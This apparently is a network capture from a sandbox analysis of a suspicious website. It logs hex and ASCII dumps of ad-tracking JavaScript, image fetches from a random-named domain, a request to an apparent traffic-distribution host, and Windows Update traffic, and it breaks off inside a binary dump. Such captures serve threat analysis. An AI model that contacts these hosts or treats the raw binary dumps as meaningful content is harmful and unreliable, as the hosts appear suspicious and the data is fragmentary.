2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 2e 69 6e 64 65 78 4f 66 28 22 68 74 74 70 22 29 29 7b 76 61 72 20 62 3d 68 2e 70 72 6f 74 6f 63 6f 6c 2b 65 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2b 65 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2c 63 3d 6b 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 61 73 65 22 29 5b 30 5d 3b 63 26 26 28 63 3d 63 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 29 26 26 28 62 3d 63 29 3b 22 2f 22 3d 3d 61 2e 63 68 61 72 41 74 28 30 29 3f 28 63 3d 62 2e 69 6e 64 65 78 4f 66 28 22 2f 22 2c 39 29 2c 2d 31 3c 63 26 26 28 62 3d 62 2e 73 6c 69 63 65 28 30 2c 63 29 29 29 3a 28 63 3d 62 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2f 22 29 2c 62 3d 39 3c 63 3f 62 2e 73 6c 69 63 65 28 30 2c 63 2b 31 29 3a 62 2b 22 2f 22 29 3b Data Ascii: .indexOf("http")){var b=h.protocol+e.location.host+e.location.pathname,c=k.getElementsByTagName("base")[0];c&&(c=c.getAttribute("href"))&&(b=c);"/"==a.charAt(0)?(c=b.indexOf("/",9),-1<c&&(b=b.slice(0,c))):(c=b.lastIndexOf("/"),b=9<c?b.slice(0,c+1):b+"/");
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 24 73 66 3f 77 3a 72 29 7d 63 61 74 63 68 28 63 29 7b 62 3d 72 2c 64 2e 63 6c 6f 67 28 22 69 66 72 61 6d 65 54 79 70 65 3a 20 22 2b 63 2e 6d 65 73 73 61 67 65 29 7d 72 65 74 75 72 6e 20 62 7d 2c 69 66 72 61 6d 65 45 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 75 6c 6c 3b 61 3d 61 7c 7c 77 69 6e 64 6f 77 3b 74 72 79 7b 62 3d 61 2e 66 72 61 6d 65 45 6c 65 6d 65 6e 74 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 20 62 7d 2c 69 66 72 61 6d 65 54 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 77 69 6e 64 6f 77 2c 62 3d 6e 75 6c 6c 3b 74 72 79 7b 66 6f 72 28 3b 61 21 3d 77 69 6e 64 6f 77 2e 74 6f 70 3b 29 62 3d 61 2c 61 3d 61 2e 70 61 72 65 Data Ascii: "undefined"!=typeof window.$sf?w:r)}catch(c){b=r,d.clog("iframeType: "+c.message)}return b},iframeEle:function(a){var b=null;a=a\|\|window;try{b=a.frameElement}catch(c){}return b},iframeTop:function(){var a=window,b=null;try{for(;a!=window.top;)b=a,a=a.pare
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 6f 6f 6b 69 65 28 6b 2e 63 6f 6f 6b 69 65 2c 22 74 72 61 63 65 72 74 72 61 66 66 69 63 22 29 3b 61 3d 65 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 61 3d 2f 74 79 6e 74 3d 2f 2e 74 65 73 74 28 61 29 3f 61 2e 6d 61 74 63 68 28 2f 74 79 6e 74 3d 3f 28 5b 5e 3f 26 24 23 5d 2a 29 2f 29 5b 31 5d 3a 0a 21 31 3b 76 61 72 20 71 3d 74 68 69 73 2e 67 65 74 50 72 69 76 61 63 79 50 61 72 61 6d 65 74 65 72 73 28 29 3b 67 3d 63 3d 74 68 69 73 2e 5f 69 63 55 72 6c 2b 22 2f 62 2f 70 3f 69 64 3d 22 2b 74 68 69 73 2e 74 79 6e 74 49 64 73 28 29 2b 28 62 3f 22 26 65 74 3d 22 2b 62 3a 22 22 29 2b 28 61 3f 22 26 61 3d 22 2b 61 3a 22 22 29 2b 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 54 79 6e 74 2e 62 3f 22 26 62 3d 22 2b 54 79 6e 74 2e 62 3a 22 22 29 2b 22 26 6c Data Ascii: ookie(k.cookie,"tracertraffic");a=e.location.hash;a=/tynt=/.test(a)?a.match(/tynt=?([^?&$#]*)/)[1]:!1;var q=this.getPrivacyParameters();g=c=this._icUrl+"/b/p?id="+this.tyntIds()+(b?"&et="+b:"")+(a?"&a="+a:"")+("string"==typeof Tynt.b?"&b="+Tynt.b:"")+"&l
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 2e 5f 6d 61 78 52 65 66 29 29 2c 65 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 61 3d 31 29 3b 65 2e 5f 33 33 41 63 72 6f 73 73 2e 73 74 61 74 65 2e 64 65 44 6f 6e 65 3e 3d 61 7c 7c 28 2b 2b 65 2e 5f 33 33 41 63 72 6f 73 73 2e 73 74 61 74 65 2e 64 65 44 6f 6e 65 2c 31 21 3d 3d 65 2e 5f 33 33 41 63 72 6f 73 73 2e 73 74 61 74 65 2e 64 65 44 6f 6e 65 26 26 21 30 21 3d 3d 63 7c 7c 74 68 69 73 2e 77 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 5f 33 33 41 63 72 6f 73 73 2e 73 74 61 74 65 2e 69 63 44 6f 6e 65 3d 3d 0a 70 7d 2c 67 2c 7b 74 69 6d 65 6f 75 74 3a 33 30 30 2c 74 69 6d 65 6f 75 74 43 61 6c 6c 62 61 63 6b 3a 67 2c 63 61 6c 6c 62 61 63 6b 44 61 74 61 3a 65 2e 5f 33 33 41 63 72 6f 73 73 2e 73 Data Ascii: ._maxRef)),e)}"undefined"==typeof a&&(a=1);e._33Across.state.deDone>=a\|\|(++e._33Across.state.deDone,1!==e._33Across.state.deDone&&!0!==c\|\|this.when(function(){return e._33Across.state.icDone==p},g,{timeout:300,timeoutCallback:g,callbackData:e._33Across.s
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 2b 64 29 69 66 28 22 25 22 3d 3d 63 2e 63 68 61 72 41 74 28 63 2e 6c 65 6e 67 74 68 2d 64 29 29 72 65 74 75 72 6e 20 63 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 63 2e 6c 65 6e 67 74 68 2d 64 29 3b 72 65 74 75 72 6e 20 63 7d 2c 77 68 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 66 2c 68 2c 6b 2c 6c 3d 6e 75 6c 6c 2c 79 3d 6e 75 6c 6c 2c 6e 3d 61 28 29 3b 63 3d 63 7c 7c 7b 7d 3b 66 3d 63 2e 69 6e 74 65 72 76 61 6c 7c 7c 35 30 3b 68 3d 63 2e 74 69 6d 65 6f 75 74 3b 6b 3d 63 2e 74 69 6d 65 6f 75 74 43 61 6c 6c 62 61 63 6b 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 69 66 28 6e 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 64 2c 6e 2c 63 2e 63 61 6c 6c 62 61 63 6b 44 61 74 61 29 2c 21 30 3b 6c 3d 65 2e 73 65 74 49 6e 74 65 72 76 61 Data Ascii: +d)if("%"==c.charAt(c.length-d))return c.substring(0,c.length-d);return c},when:function(a,b,c,d){var f,h,k,l=null,y=null,n=a();c=c\|\|{};f=c.interval\|\|50;h=c.timeout;k=c.timeoutCallback\|\|function(){};if(n)return b.call(d,n,c.callbackData),!0;l=e.setInterva
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 61 72 20 61 2c 62 2c 63 2c 64 3d 5b 5d 3b 61 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3b 69 66 28 2d 31 21 3d 61 29 66 6f 72 28 62 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 75 62 73 74 72 69 6e 67 28 61 2b 31 2c 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 65 6e 67 74 68 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 61 3d 30 3b 61 3c 62 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 63 3d 62 5b 61 5d 2e 73 70 6c 69 74 28 22 3d 22 29 2c 64 5b 63 5b 30 5d 5d 3d 63 5b 31 5d 3b 72 65 74 75 72 6e 20 64 7d 7d 2c 74 3d 7b 75 73 70 53 74 72 69 6e 67 3a 6e 75 6c 6c 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 77 69 6e 64 6f 77 2c Data Ascii: ar a,b,c,d=[];a=location.href.indexOf("?");if(-1!=a)for(b=location.href.substring(a+1,location.href.length).split("&"),a=0;a<b.length;a++)c=b[a].split("="),d[c[0]]=c[1];return d}},t={uspString:null,init:function(){var a=this,b=function(){for(var a=window,
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 5f 67 70 70 4c 6f 63 61 74 6f 72 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 21 31 29 7d 3b 64 2e 6f 6e 28 77 69 6e 64 6f 77 2c 22 6d 65 73 73 61 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 64 61 74 61 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 29 74 72 79 7b 63 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 62 2e 64 61 74 61 29 7d 63 61 74 63 68 28 65 29 7b 63 3d 6e 75 6c 6c 2c 64 2e 6c 6f 67 28 22 4a 53 4f 4e 2e 70 61 72 73 65 20 65 78 63 65 70 74 69 6f 6e 3a 22 2c 62 2e 64 61 74 61 29 7d 63 26 26 63 2e 5f 5f 67 70 70 52 65 74 75 72 6e 26 26 28 62 3d 63 2e 5f 5f 67 70 70 52 65 74 75 72 6e 2c 61 5b 62 2e 63 61 6c 6c 49 64 5d 28 62 2e 72 65 74 75 72 6e 56 61 6c 75 65 2c 62 2e 73 75 63 63 65 73 73 29 2c 64 Data Ascii: _gppLocator not found",!1)};d.on(window,"message",function(b){var c=b.data;if("string"===typeof b.data)try{c=JSON.parse(b.data)}catch(e){c=null,d.log("JSON.parse exception:",b.data)}c&&c.__gppReturn&&(b=c.__gppReturn,a[b.callId](b.returnValue,b.success),d
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 63 6f 6e 64 73 2e 22 29 3b 61 28 66 2e 6e 75 6c 6c 44 61 74 61 28 29 29 7d 2c 66 2e 74 69 6d 65 6f 75 74 4d 73 29 3a 61 28 66 2e 6e 75 6c 6c 44 61 74 61 28 29 29 3b 66 2e 72 65 63 65 69 76 65 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 26 26 28 66 2e 67 70 70 53 74 72 69 6e 67 3d 63 3f 63 2e 67 70 70 53 74 72 69 6e 67 3a 6e 75 6c 6c 2c 66 2e 67 70 70 53 69 64 3d 66 2e 67 65 74 41 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 28 63 29 2c 6e 75 6c 6c 21 3d 66 2e 67 70 70 53 74 72 69 6e 67 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 2c 61 28 7b 67 70 70 3a 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 66 2e 67 70 70 53 74 72 69 6e 67 3f 66 2e 67 70 70 53 74 72 69 6e 67 3a 6e 75 6c 6c 2c 67 70 70 53 69 64 3a 66 2e 67 70 70 53 Data Ascii: conds.");a(f.nullData())},f.timeoutMs):a(f.nullData());f.receiveData=function(c){c&&(f.gppString=c?c.gppString:null,f.gppSid=f.getApplicableSections(c),null!=f.gppString&&(clearTimeout(e),a({gpp:"string"===typeof f.gppString?f.gppString:null,gppSid:f.gppS

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:42 UTC	418	OUT	GET /images/empty.png HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: visit=1
2025-10-17 06:51:42 UTC	287	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:42 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:17 GMT ETag: "124d-64041ed397651" Accept-Ranges: bytes Content-Length: 4685 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/png
2025-10-17 06:51:42 UTC	1460	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 02 03 00 00 00 62 7b 2c 1a 00 00 02 f0 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 65 78 69 66 00 00 78 da ed 97 4b 92 1c 2b 0c 45 e7 ac c2 4b 48 49 08 89 e5 90 7c 22 bc 03 2f df 17 f2 e3 ae ea f2 a0 de 1b 39 a2 20 12 48 20 af 84 0e 50 dd a1 ff fa 39 c2 0f 24 ca 9e 42 54 f3 94 53 da 90 62 8e 99 0b 1a be 1d a9 ac 92 b6 b8 ca ed 7c bb ea 87 fe 70 0f 30 5a 82 5a 8e 57 4f e7 fc ab ff 49 88 0a 5a fa 45 c8 eb 39 b0 3f 0e e4 78 ea fb 93 10 1f 95 4c 8f 66 bb 9d 42 f9 14 12 3e 06 e8 14 28 c7 b2 b6 94 dd be 2e 61 ef 47 7d 7e 7f 84 c1 e7 d2 50 44 7f 74 fb db bb 21 7a 4d 61 47 98 bb 90 6c 28 45 4e 07 64 3e 12 a4 a0 11 8f 72 4e 44 2e 78 1c a5 ca b5 24 04 e4 55 9c ee 94 e1 d1 98 Data Ascii: PNGIHDRb{,zTXtRaw profile type exifxK+EKHI\|"/9 H P9$BTSb\|p0ZZWOIZE9?xLfB>(.aG}~PDt!zMaGl(ENd>rND.x$U
2025-10-17 06:51:42 UTC	1460	IN	Data Raw: 6d 70 4d 4d 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 6d 6d 2f 22 0a 20 20 20 20 78 6d 6c 6e 73 3a 73 74 45 76 74 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 45 76 65 6e 74 23 22 0a 20 20 20 20 78 6d 6c 6e 73 3a 64 63 3d 22 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 65 6c 65 6d 65 6e 74 73 2f 31 2e 31 2f 22 0a 20 20 20 20 78 6d 6c 6e 73 3a 47 49 4d 50 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 69 6d 70 2e 6f 72 67 2f 78 6d 70 2f 22 0a 20 20 20 20 78 6d 6c 6e 73 3a 74 69 66 66 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 74 69 66 66 2f 31 2e 30 2f 22 0a 20 20 20 20 78 6d 6c 6e 73 3a 78 6d Data Ascii: mpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:GIMP="http://www.gimp.org/xmp/" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xm
2025-10-17 06:51:42 UTC	1460	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii:
2025-10-17 06:51:42 UTC	305	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 77 22 3f 3e 6a e5 12 0e 00 00 00 09 50 4c 54 45 00 00 00 fe f1 f3 fe fe fe 22 1c 1c ff 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 01 62 4b 47 44 00 88 05 1d 48 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 Data Ascii: <?xpacket end="w"?>jPLTE"tRNS@fbKGDHpHYs
2025-10-17 06:51:57 UTC	427	OUT	GET /images/arrow.png HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: visit=1; click=1
2025-10-17 06:51:57 UTC	285	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:57 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:16 GMT ETag: "2fa-64041ed3484ad" Accept-Ranges: bytes Content-Length: 762 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/png
2025-10-17 06:51:57 UTC	762	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2f 00 00 00 38 08 04 00 00 00 c7 fd 69 04 00 00 02 c1 49 44 41 54 78 01 b5 c1 eb 6b 95 75 00 00 e0 e7 3d 67 e7 6c 6b 5b 83 39 63 35 24 95 61 e4 4a 04 25 2b 47 21 b6 91 10 ce 8c 58 1a 64 61 17 15 26 62 62 a6 ab c8 48 88 d4 f5 c1 0f 86 92 5a b9 40 e7 44 91 2e b0 2f 4b 5b cc 9a 09 6b 73 b2 c9 b6 e3 d4 dd da b2 22 49 14 42 fa 0f da ef 7d 1e 41 45 12 92 52 72 e4 cb 15 09 26 21 a5 48 b9 2a 2f 79 d3 fb 3e f0 82 62 01 24 a4 dd 67 b1 37 ec 72 4c ab 6e 83 46 5c 75 c2 43 22 93 92 54 ac 42 ad 7d ce e8 33 64 c0 2f be 71 d0 2e 9b 55 2a 34 09 59 4a 54 db a9 45 c6 b8 6e a7 d4 ab f5 ac 47 4d 57 20 4b e4 7f cb 52 6a 99 3d 3a fd 69 d0 77 3e b2 d2 7c 53 a4 45 22 93 92 50 a4 ca 27 ce fb 43 af af ac 31 4f a1 a4 48 00 69 Data Ascii: PNGIHDR/8iIDATxku=glk[9c5$aJ%+G!Xda&bbHZ@D./K[ks"IB}AERr&!H/y>b$g7rLnF\uC"TB}3d/q.U4YJTEnGMW KRj=:iw>\|SE"P'C1OHi

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:42 UTC	937	OUT	GET /b/p?id=w!3ck54buj9z~w!3wcfa1cqds&lm=0&ts=1760683901571&dn=TC&iso=0&pu=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F&t=CloudFlare&chpv=10.0.0&chuav=Chromium%3Bv%3D134.0.6998.89%2C%20Not%3AA-Brand%3Bv%3D24.0.0.0%2C%20Google%20Chrome%3Bv%3D134.0.6998.89&chp=Windows&chmob=0&chua=Chromium%3Bv%3D134%2C%20Not%3AA-Brand%3Bv%3D24%2C%20Google%20Chrome%3Bv%3D134 HTTP/1.1 host: ic.tynt.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: image sec-fetch-storage-access: active referer: https://xpoalswwkjddsljsy.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-10-17 06:51:42 UTC	731	IN	HTTP/1.1 200 OK server: nginx/1.16.1 date: Fri, 17 Oct 2025 06:51:42 GMT content-type: image/gif content-length: 35 last-modified: Fri, 16 Apr 2010 15:38:20 GMT etag: "4bc8846c-23" cache-control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false" accept-ch: Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Model, Sec-CH-UA-Full-Version-List, Sec-CH-UA, Sec-CH-UA-Mobile expires: "Sat, 26 Jul 1997 05:00:00 GMT" set-cookie: uid=CoIKSWjx5369lpO9BGO0Ag==; expires=Sat, 17-Oct-26 06:51:42 GMT; domain=tynt.com; path=/; Secure; SameSite=None p3p: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" accept-ranges: bytes p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
2025-10-17 06:51:42 UTC	35	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 ff 00 ff ff ff 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a,D;

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:42 UTC	834	OUT	GET /deb/v2?id=w!3ck54buj9z~w!3wcfa1cqds&dn=TC&cc=1&chpv=10.0.0&chuav=Chromium%3Bv%3D134.0.6998.89%2C%20Not%3AA-Brand%3Bv%3D24.0.0.0%2C%20Google%20Chrome%3Bv%3D134.0.6998.89&chp=Windows&chmob=0&chua=Chromium%3Bv%3D134%2C%20Not%3AA-Brand%3Bv%3D24%2C%20Google%20Chrome%3Bv%3D134&r=&pu=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F HTTP/1.1 host: de.tynt.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: script sec-fetch-storage-access: active referer: https://xpoalswwkjddsljsy.com/ accept-encoding: identity accept-language: en-US,en;q=0.9
2025-10-17 06:51:42 UTC	384	IN	HTTP/1.1 200 OK cache-control: max-age=86400 expires: Sat, 18 Oct 2025 06:51:42 GMT accept-ch: Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Model, Sec-CH-UA-Full-Version-List, Sec-CH-UA, Sec-CH-UA-Mobile content-type: application/javascript content-length: 4 date: Fri, 17 Oct 2025 06:51:41 GMT p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
2025-10-17 06:51:42 UTC	4	IN	Data Raw: 2f 2a 2a 2f Data Ascii: /**/

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:42 UTC	359	OUT	GET /js HTTP/1.1 host: tdsworkout.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:42 UTC	394	IN	HTTP/1.1 200 OK server: nginx date: Fri, 17 Oct 2025 06:51:42 GMT content-type: text/html; charset=utf-8 content-length: 0 cache-control: no-cache, no-store, must-revalidate expires: Fri, 17 Oct 2025 06:51:42 GMT set-cookie: e3b0c4_1=1d7r1r12e2shbl; expires=Fri, 24 Oct 2025 06:51:39 GMT; path=/; domain=tdsworkout.com; secure; httponly; samesite=none access-control-allow-origin: *

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:43 UTC	309	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.3324/0?CH=563&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=AcPUwcOz8OR7GCH&MD=a89v54tN HTTP/1.1 host: slscr.update.microsoft.com accept: / user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 accept-encoding: identity
2025-10-17 06:51:43 UTC	558	IN	HTTP/1.1 200 OK content-type: application/octet-stream date: Fri, 17 Oct 2025 06:51:43 GMT cache-control: no-cache etag: "vHtJSfR1Ft1hGPDsRVjAkwEfdgE6JTb6sFcWPgdDrxE=_2880" expires: -1 last-modified: Mon, 01 Jan 0001 00:00:00 GMT pragma: no-cache content-length: 28399 slsversion: 2.0 ms-correlationid: e62fc5bb-9f67-4d3b-b541-57a1d2bed01d ms-requestid: 41ed6ca7-6cf7-43ba-9f49-6a33befcd028 ms-cv: ctbOGuSfMU+YHAnt.0 x-content-type-options: nosniff x-microsoft-slsclientcache: 2880 content-disposition: attachment; filename=environment.cab
2025-10-17 06:51:43 UTC	1460	IN	Data Raw: 4d 53 43 46 00 00 00 00 3f 24 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 9a 2d 00 00 14 00 00 00 00 00 10 00 3f 24 00 00 b0 4a 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 5e 4c 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 2c 32 33 a6 d3 23 5e 4c 43 4b ec 5a 07 54 14 d9 b6 ed 44 8e 92 41 50 72 90 54 1d c8 39 07 c9 51 b2 48 8e 4d 14 c9 d0 20 08 8a 28 a0 22 0a 36 82 64 90 24 2a 22 39 23 08 28 92 25 18 00 41 10 11 44 25 fc 06 0c 38 33 6f e6 cf 5b 6b d6 7b ff 2f 6b ad ee ae 1b ea d6 ad 5b f7 9c 7d ce ee ad 6d a8 a4 0a c2 1d 3d 60 d0 ee a1 bc f7 03 82 82 c1 20 30 08 06 8a b0 05 81 68 76 6b 28 77 fb 5c d0 04 7d 3f ec 71 9f 9d 5e d3 10 d0 be 23 02 e4 e0 79 d2 c5 07 ed e9 e1 e0 e9 27 74 Data Ascii: MSCF?$D-?$Jd^Lenvironment.cab,23#^LCKZTDAPrT9QHM ("6d$*"9#(%AD%83o[k{/k[}m=` 0hvk(w\}?q^#y't
2025-10-17 06:51:43 UTC	1460	IN	Data Raw: e0 f1 ed a1 c1 60 98 2d 60 03 58 7d 2b 03 90 18 fd bf bc 99 83 8f 9f ef df b8 9d 1f 40 ba f3 40 d4 60 f0 36 0c 02 80 7e 63 d4 50 0c 04 0c 2a c7 28 c9 3d aa f7 cd f1 0a 5a b2 9f b3 7a 73 a0 d6 6b 0b 5b 17 df 35 7f e3 99 ab 84 4d 76 ff 13 7f 4b 16 e3 d4 82 4b 35 d8 c7 22 dc 62 8c 31 67 86 c9 86 33 bc 37 18 ab 89 c4 4a e7 9f 13 0a b8 5a 3f d1 35 a6 51 3a 96 38 5e bc 94 77 21 b8 ee ae e9 94 3d 66 d0 ea d3 c5 0a be ec cd 78 b6 0d 2e e1 4c 07 76 cd c0 51 3e c2 15 d4 94 d2 e5 ec 37 a4 e3 44 35 5e 22 cb 02 09 0f 79 5b 0f 5c b2 8b 53 17 3d ea 00 e1 08 1b 31 32 16 e9 4d b7 ed 3f 97 0f 6d 2e 26 eb b2 4c ea 12 35 21 a8 ec 55 6f 7b c4 94 c7 d8 9f 7d 80 49 eb d9 ca 52 